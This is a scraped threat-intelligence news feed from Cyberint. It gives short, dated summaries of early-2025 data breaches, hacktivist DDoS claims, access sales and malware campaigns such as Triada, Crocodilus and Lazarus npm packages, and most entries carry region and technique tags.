news
Breaking Cyber News From Cyberint
Breaking news feed of the latest cyber incidents, breaches, vulnerabilities, malware, ransomware and so much more.
- All Items
- Endesa S.A
- Spain
- Europe
- Energy
- Southern Europe
- Donalddump
- Asia
- Middle East
- Access Israel
- Ruskinet
- Israel
- Network Denial Of Service
- Education
- Satanic
- Magento
- United States
- North America
- Business Services
- Islamic Republic Of Iran
- Telecommunications
- Shadowbits
- Mobile Communication Company Of Iran
- Southern Asia
- Technology
- Real Estate
- Pipemagic
- Software
- Storm-2460
- Saudi Arabia
- Finance
- Retail
- CVE-2025-29824
- Cve-2025-29824
- Latin America And The Caribbean
- Venezuela
- Marssepe
- Mexico
- Uac-0226
- Government
- Ukraine
- Giftedcrook
- Eastern Europe
- Israeli Ministry Of Defense
- Islamic Hacker Army
- Ddos Attack Against Israeli Ministry Of Defense
- Exfiltration Over C2 Channel
- Lazarus Group
- Javascript
- Automated Collection
- Ingress Tool Transfer
- System Information Discovery
- Browser Information Discovery
- Financial Theft
- Beavertail
- Eastern Asia
- Installer Packages
- Data From Local System
- Keychain
- File And Directory Discovery
- Upload Malware
- Credentials From Web Browsers
- Compromise Software Supply Chain
- Obfuscated Files Or Information
- South Korea
- Malicious File
- Triada
- Russia
- Poria.Org.Il
- Healthcare
- Vortex
- Social Media Accounts
- Bypass User Account Control
- Account Access Removal
- Bangladesh
- Authentication Bypass
- Account Manipulation
- Indonesia
- Israel-Catalog
- Red Wolf Team
- Lucid
- Xinxin Group
- Jinx-0126
- Xmrig
- United Kingdom
- Ghna
- Royal Mail
- Samsung
- Turkey
- Crocodilus
- Taiwan
- Pjobrat
- Phishing
- Morphing Meerkat
- Dienet
- Mcgrath
- Australia And New Zealand
- Australia
- Entertainment
- Anonymous 71
- Social Services
- Argal Services
- Israel Police - Cyber Crime Unit
- Restoration Site, Rosh Pena Restoration Association
- Rippersec
- Technion Israel Institute Of Technology
- Bangladesh Civilian Force
- Bar-Ilan University
- Systemadminbd
- Turkiz
- Insurance Agents, Brokers And Service
- 10Buy.Co.Il
- Anonymous Bd
- Hillshave
- Western Europe
- Luxury Watches
- France
- Coreinjection
- Electronic Tigers Unit
- Hadshon Hebrew
- Galilee Development Authority
- Automotive
- Clal Insurance
- Manufacturing
- Kospy
- Apt37
- Shenkar College
- Pogrom.Org.Il
- Ministry Of Education (Israel
- Se Lawfirm
- Jbags.Co.Il
- Stock Matok
- Netzz.Co.Il
- Lulzsec Black
- Legal Services
- Heldstudio.Co.Il
- Honigsfeld.Co.Il
- Jokeir 07X
- 4Sale Real Estate
- Sheket Team
- Health Services
- Gadish-Maoz
- Construction
- Media
- Libi Studio
- Israel'S Traditional Chinese Medicine Association
- Gufyprint.Co.Il
- Miscellaneous Manufacturing Industries
- The Knesset
- Babuk2
- Hades_Hgs
- Turk Nokta Net
- South-Eastern Asia
- Luxurysp1D3R
- National Telecommunications Commission
- Philippines
- Juniper
- Unc3886
- National Union Of School Sports
- Vorvitz_5
- Northern Africa
- Uganda
- Cambodia
- Cve-2017-11882
- Rwanda
- Maldives
- India
- United Arab Emirates
- Afghanistan
- Sub-Saharan Africa
- Algeria
- Sidewinder
- Stealerbot
- Vietnam
- Djibouti
- Egypt
- CVE-2017-11882
- Bulgaria
- Africa
- China
- Jaguar Land Rover
- Hikki-Chan
- Transportation
- Israel Innovation Authority
-
Apr 10, 2025
Endesa ENERGIA XXI- Breach - 2025-04-05
The threat actor known as DonaldDump claims to have breached Spanish utilities company Energía XXI and is selling a database containing 4,015,311 records for 7500$. According to the post, the compromised data includes national ID numbers (DNI), full names, phone numbers, addresses, email addresses, IBANs, and utility identifiers (LUZCUPS or GASCUPS). All records include bank account details (IBANs).
-
Apr 10, 2025
-
Apr 10, 2025
Threat Actor Satanic Leaks Magento CRM Data of 745,000 Users
On April 9th, 2025, the threat actor known as "Satanic" leaked data allegedly stolen from a third-party vendor of Magento. According to the threat actor, over 740 thousand user records were taken, including 430,000 emails and 261,000 phone numbers linked to major global companies—posing serious phishing and fraud risks.
-
Apr 10, 2025
Threat Actors Claim Breach of Iran's Biggest Telecommunications Company
In April 2025, the threat actor group named Shadowbits claimed to have breached Hamrahe Avval (MCI), Iran's largest mobile operator, and to have gained access to its database. According to the threat actor, a substantial amount of data belonging to MCI's customers was taken, including full names, father names, place of birth, gender, national ID numbers, addresses, postal codes, birth dates, mobile numbers, and SIM card information.
-
Apr 10, 2025
Exploitation of Windows Zero-Day Leads to Ransomware Attacks
Microsoft has disclosed that a recently patched zero-day vulnerability in the Windows Common Log File System (CLFS), identified as CVE-2025-29824, was exploited in targeted ransomware attacks against organizations in various sectors including IT, real estate, finance, and retail across the United States, Venezuela, Spain, and Saudi Arabia. The attacks utilized a malware named 'pipemagic' to deliver the exploit and ransomware payloads, with the initial access vector still under investigation. This vulnerability allows for privilege escalation, enabling threat actors to gain system privileges and deploy ransomware effectively within compromised environments.
-
Apr 09, 2025
Threat Actor Claims Breach of 8 Mexican Education Institutes
In April 2025, the threat actor "marssepe" claimed to have breached 8 Mexican Education institutes. The threat actor has claimed to have access to the institutes' internal databases, including students, teachers, and administration information.
-
Apr 09, 2025
New Cyber Attacks Target Ukrainian Institutions with an Infostealer
The Computer Emergency Response Team of Ukraine (CERT-UA) has reported a series of cyber attacks aimed at Ukrainian institutions, particularly military and law enforcement agencies near the eastern border. These attacks involve phishing emails containing macro-enabled Excel spreadsheets that deploy two types of malware: a PowerShell script that opens a reverse shell and a new stealer called GiftedCrook, which is designed to steal sensitive data from web browsers. The emails are sent from compromised accounts to appear legitimate, and CERT-UA has attributed the activity to a threat cluster identified as UAC-0226.
-
Apr 06, 2025
-
Apr 06, 2025
North Korean Lazarus Group Expands Malicious npm Campaign
The North Korean Lazarus Group has intensified its malicious campaign on the npm ecosystem by releasing new packages that deliver the Beavertail malware and a remote access trojan (RAT) loader. These packages, which masquerade as legitimate utilities, have been designed to evade detection through advanced obfuscation techniques. The campaign aims to infiltrate developer systems under the guise of job interviews, steal sensitive data, and maintain long-term access to compromised systems. Security researchers have identified multiple new npm packages linked to this campaign, indicating the attackers' ongoing efforts to diversify their tactics and increase their success rate.
-
Apr 06, 2025
Emergence of Triada Malware in Counterfeit Android Devices
A new variant of the Triada malware has been discovered preloaded on counterfeit Android smartphones, affecting over 2,600 users, primarily in Russia. This modular malware, first identified in 2016, is capable of stealing sensitive information, manipulating device functions, and enlisting infected devices into a botnet. The malware is distributed through modified apps and has been linked to a broader fraud scheme involving compromised hardware supply chains. Recent analyses indicate that the malware allows attackers to perform various malicious activities, including intercepting messages and hijacking cryptocurrency wallet addresses. The updated version of Triada has reportedly facilitated the transfer of approximately $270,000 in cryptocurrencies to the attackers' wallets between June 2024 and March 2025.
-
Apr 03, 2025
Vortex Telegram group Launches DDoS Attack on Poria Hospital Website
Hacktivists behind the Vortex Telegram group launched a DDoS attack on Poria Hospital's website (poria.org.il), temporarily taking it down. The site has since recovered and is currently active. This incident highlights ongoing cyber threats against Israeli online assets.
-
Apr 02, 2025
Hackers Exploit Voicemail to Hijack Telegram Accounts in Israel
Cybersecurity experts have warned of a surge in Telegram account hijackings targeting Israelis, with attackers exploiting voicemail vulnerabilities to gain unauthorized access. The Israeli Internet Association has reported a significant increase in cases, linking the attacks to hackers in Bangladesh and Indonesia. The method, which relies on social engineering and technical loopholes, allows attackers to seize control of accounts and lock victims out.
-
Apr 02, 2025
-
Apr 02, 2025
Lucid: The New Phishing-as-a-Service Platform Targeting Global Entities
A new phishing-as-a-service (PhaaS) platform named Lucid has emerged, targeting 169 entities across 88 countries through smishing messages sent via Apple iMessage and Android's RCS. Developed by a Chinese-speaking hacking group known as the Xinxin group, Lucid utilizes legitimate communication channels to bypass traditional SMS detection mechanisms, allowing for large-scale phishing campaigns aimed at stealing credit card information and personally identifiable information. The platform offers automation tools for creating customizable phishing websites and includes advanced anti-detection techniques, enabling cybercriminals to monitor victim interactions in real-time. This development highlights the growing sophistication and organization of phishing operations in the cybercrime landscape.
-
Apr 02, 2025
Ongoing PostgreSQL Exploitation Campaign Targets Cryptocurrency Mining
A new campaign targeting exposed PostgreSQL instances aims to gain unauthorized access and deploy cryptocurrency miners. The campaign, attributed to the threat actor known as Jinx-0126, has reportedly affected over 1,500 victims due to weak or predictable credentials. Researchers have noted that the threat actor employs advanced evasion techniques, such as using unique hashes for binaries and executing miner payloads filelessly. The exploitation involves executing arbitrary shell commands through SQL commands, leading to the installation of a cryptocurrency miner and establishing persistence on compromised systems.
-
Apr 01, 2025
Threat Actor Claims to Have Breached Royal Mail Group
On March 31, 2025, the threat actor GHNA leaked 144GB of data from Royal Mail Group, including sensitive customer information, internal documents, and Zoom meeting recordings. The breach exposed personal identifiable information (PII) such as names, addresses, and package details, as well as confidential communications between Spectos and Royal Mail Group. The leak also included a Wordpress SQL database for mailagents.uk, Mailchimp mailing lists, and datasets with delivery/post office locations. The total leak consisted of 293 folders and 16,549 files
-
Mar 31, 2025
Samsung Electronics Germany Data Breach
In March 2025, Samsung Electronics (Germany) experienced a data breach that resulted in the leak of over 270,000 customer satisfaction tickets on BreachForums. The leaked tickets contain sensitive personal information (PII) of customers, including full names, addresses, email addresses, and order numbers. The breach was attributed to threat actor GHNA, who uploaded the data to the forum for public download.
-
Mar 31, 2025
Crocodilus: A New Android Banking Trojan Targeting Spain and Turkey
Cybersecurity researchers have identified a new Android banking malware named Crocodilus, which is specifically designed to target users in Spain and Turkey. Unlike typical clones, Crocodilus is a sophisticated threat featuring advanced techniques such as remote control, black screen overlays, and extensive data harvesting through accessibility logging. The malware masquerades as a Google Chrome app and, once installed, requests accessibility permissions to connect with a remote server for further instructions. It can intercept credentials from various financial applications and even cryptocurrency wallets by using social engineering tactics to trick users into revealing their seed phrases. The malware's capabilities include monitoring app launches, capturing screen content, and concealing its activities, marking a significant escalation in the sophistication of mobile banking threats.
-
Mar 30, 2025
Pjobrat Malware Targets Taiwanese Users Through Chat Apps
The Pjobrat malware, previously associated with attacks on Indian military personnel, has resurfaced in a new campaign targeting Taiwanese users by masquerading as chat applications. This malware is capable of stealing sensitive information such as SMS messages, contacts, and media files from infected Android devices. The latest campaign utilized malicious apps named Sangaallite and Cchat, available for download from various WordPress sites, and operated for nearly two years before pausing in October 2024. The targeted nature of the campaign suggests a small number of infections, likely facilitated by social engineering tactics to deceive users into downloading the malicious apps.
-
Mar 30, 2025
Morphing Meerkat - New Phishing-as-a-Service Campaign
Cybersecurity researchers have uncovered a new phishing-as-a-service (PhaaS) platform operated by a threat actor known as 'Morphing Meerkat,' which exploits DNS mail exchange records to create fake login pages impersonating around 114 brands. This actor utilizes open redirects on adtech infrastructure and compromised domains to distribute phishing emails, often directing victims to fake login pages hosted on Cloudflare R2. The campaign is notable for its ability to dynamically translate phishing content into multiple languages and for employing anti-analysis techniques to complicate detection. By leveraging DNS MX records, the actor can tailor phishing attempts to specific email service providers, enhancing the likelihood of credential theft.
-
Mar 26, 2025
DieNet Claim Breach of Australian Real Estate Company McGrath
On March 25, 2025, the hacktivist group "DieNet" claimed responsibility for breaching McGrath, one of Australia's largest and fourth-ranked real estate companies. The breach allegedly involved the seizure of the company's entire database, which included sensitive data such as employee information, customer details, and business financial data (including receipts and company revenues). The group also mentioned that personal information of hundreds of real estate companies and individuals would be published. The targeting was reportedly motivated by Australia's alliance with the United States and support for Trump.
-
Mar 23, 2025
Anonymous 71 Claims Attack on 10 Israeli Sites
On March 23rd, 2025, the hacktivist group Anonymous 71 claimed to have shut down 10 Sites, 8 of which were located in Israel. The affected sites belong to companies in the Entertainment, Business Services, and Social Services sectors. The group has provided evidence of its DDoS attacks.
-
Mar 20, 2025
-
Mar 20, 2025
-
Mar 20, 2025
-
Mar 20, 2025
-
Mar 20, 2025
-
Mar 20, 2025
-
Mar 20, 2025
-
Mar 19, 2025
Luxury-Watches - Breach- 2025-03-17
A threat actor "HillShave" has leaked a database belonging to Luxury-Watches France, a website that sells high-end watches and diamonds and is based in Nice/Paris in France. According to the threat actor, the database includes about 100-200 unique emails and names.
-
Mar 19, 2025
Threat Actor "CoreInjection" Sells Access To Israeli Digital Display Company
On March 18, 2025, the threat actor CoreInjection claimed to have gained exclusive access to a prominent Israel-based company specializing in digital display solutions for shopping malls. The access includes control over 17 Windows servers, administrative permissions within the company’s advanced management systems, and direct entry to the central server managing the display inventory, allowing for immediate content control and propagation. The group also highlighted high-speed connectivity, ideal for data extraction or exfiltration. The asking price for this access is $100,000 USD, with payment accepted exclusively via cryptocurrency. On March 18th, a digital banner in an Israeli mall was hijacked with a message saying "Defaced by Coreinjection, Clal pay the ransom", the attack could relate to previous attacks claimed by the threat actor on Clal Insurance to pressure the victim.
-
Mar 19, 2025
-
Mar 19, 2025
-
Mar 18, 2025
Threat Actor Sells Access To Israeli Automotive Company
On March 16, 2025, the threat actor group CoreInjection claimed to have gained full access to the internal network and management email systems of a prominent international car company operating in Israel. The breach includes control over the company’s Israeli network infrastructure and direct access to high-level executive and managerial email accounts. The group is offering this access for sale at $50,000 USD.
-
Mar 18, 2025
Threat Actor Claims to Have Breached Clal Insurance, Offers Database for 200 Thousand Dollars
On March 17, 2025, the threat actor CoreInjection claimed to have stolen 400,000 customer policies and sensitive files from Clal Insurance, one of Israel's largest insurance companies. The leaked dataset includes detailed policy information for 400,000 customers, along with personally identifiable information (PII), financial data, and other confidential records. The threat actor is reportedly offering the data for sale at $200,000, with payment to be made exclusively via cryptocurrency.
-
Mar 17, 2025
Sale of Admin Access to U.S. Industrial Firm Revealed on Dark Web
A threat actor known as "CoreInjection" recently posted on the dark web forum "BreachForums" offering exclusive administrative command-line interface (CLI) and shell access to a major U.S.-based industrial machinery and equipment company. The sale, priced at $100,000, grants full administrative privileges to the company's remote management system, which could allow threat actors deep control over critical systems.
-
Mar 17, 2025
New Android Spyware Kospy Linked to North Korean Threat Actor Scarcruft
The North Korea-linked threat actor Scarcruft has been identified as the creator of a new Android surveillance tool named Kospy, which targets both Korean and English-speaking users. This malware, which has been active since March 2022, masquerades as legitimate utility applications on the Google Play Store to deceive users into downloading it. Kospy is capable of collecting extensive data from infected devices, including SMS messages, call logs, and location information, while utilizing a sophisticated command-and-control infrastructure that allows it to operate stealthily. The malware's plugins and configurations remain largely unknown, as the command servers are either inactive or unresponsive.
-
Mar 17, 2025
-
Mar 16, 2025
-
Mar 16, 2025
-
Mar 16, 2025
Hacktivist Groups Claim To Have Breached Israeli Web Hosting Server and to Have Deleted 12 Israeli Websites
On March 14th, 2025, the hacktivist groups "LulzSec Black" and "Jokeir 07x" claimed to have gained access to an Israeli web hosting server and as a result, taken down 12 Israeli Sites, among those sites,
-
Mar 16, 2025
Ransomware Group Babuk2 Claims to Have Attacked The Knesset
On March 15th, the ransomware group "Babuk2" claimed to have attacked the Knesset, Israel's Parliament, and to have exfiltrated 910 GB of internal data, including more than 200 thousand documents. Babuk2 is selling the data, along with publishing a portion of the data on their DLS.
-
Mar 13, 2025
Threat Actor Claims to Have Breached TurkNet
In March 2025, a threat actor named hades_hgs claimed to have breached Turknet, a telecommunications company in Türkiye, and to have gained access to its database. According to the threat actor, approximately 2.8 million rows of data belonging to Turknet's customers were taken, including sensitive information such as customer IDs, contact details, addresses, usernames, and identification numbers.
-
Mar 13, 2025
Threat Actor Claims to Have Breached the National Telecommunications Commission (NTC) of the Philippines
In March 2025, a threat actor named LuxurySp1d3r claimed to have breached the National Telecommunications Commission (NTC) of the Philippines and to have gained access to its database. According to the threat actor, a critical dataset belonging to the NTC was taken, including sensitive information related to nationwide telecommunications operations, surveillance mechanisms, and user tracking systems.
-
Mar 13, 2025
Chinese Espionage Group Targets Juniper Routers with Custom Backdoors
The China-nexus cyber espionage group, tracked as UNC3886, has been observed targeting Juniper Networks routers in a campaign aimed at deploying custom backdoors. These backdoors exhibit various capabilities, including disabling logging mechanisms and maintaining persistent remote access. The group has evolved its tactics, previously exploiting zero-day vulnerabilities in devices from Fortinet, Ivanti, and VMware. The latest activity, identified in mid-2024, involves the use of multiple distinct backdoors based on the Tinyshell framework, showcasing the group's advanced knowledge of system internals and a focus on stealth and long-term persistence. Organizations are advised to upgrade their Juniper devices to mitigate these threats.
-
Mar 12, 2025
Data Breach Announcement: UNSS France (7.7M Citizens & 10.5K Educational Institutions)
A threat actor known as "vorvitz_5" has announced the breach of data from 7.7 million French citizens associated with the UNSS (National Union of School Sports), exposing sensitive information such as gender, full names, birthdates, personal and parental email addresses, and phone numbers. Additionally, the breach includes details of 10.5K educational institutions, with data such as institutional identifiers, administrative contacts, phone numbers, fax numbers, postal codes, and banking information (IBAN, BIC). The threat actor offers the data for sale and has shared sample files on the dark net forum "BreachForums."
-
Mar 12, 2025
Sidewinder APT Targets Maritime and Nuclear Sectors in Asia and Africa
The advanced persistent threat (APT) group known as Sidewinder has been actively targeting maritime and logistics companies, as well as nuclear energy infrastructure across South and Southeast Asia, the Middle East, and Africa. Observed by Kaspersky in 2024, the group's attacks have affected countries including Bangladesh, Cambodia, Djibouti, Egypt, the UAE, and Vietnam, with a notable focus on diplomatic entities in various nations. Sidewinder employs sophisticated tactics, including spear-phishing and exploiting known vulnerabilities, to maintain persistence on compromised networks and evade detection
-
Mar 12, 2025
Jaguar Land Rover Data Breach Exposes Sensitive Internal Documents and Employee Information
In March 2025, "Jaguar Land Rover," a global automotive leader with a reported revenue of $29.9 billion, suffered a significant data breach. The leak involved around 700 internal documents, including confidential files, development logs, tracking data, source codes, and a compromised employee dataset. This dataset exposed sensitive information such as usernames, email addresses, display names, and time zones. The breach was posted on the dark net forum "BreachForums" by the threat actor known as "Rey."
-
Mar 12, 2025
Threat Actor Publishes a Dataset of 150K Israeli Emails and Passwords
On March 12th, 2025, in an underground chat group dedicated to the circulation of stolen data, a threat actor published 2 datasets of Israeli citizens, one dataset contains 150 thousand email addresses (ending with the TLD .il) and passwords, the other seems to contain credit card information.
-
Mar 12, 2025
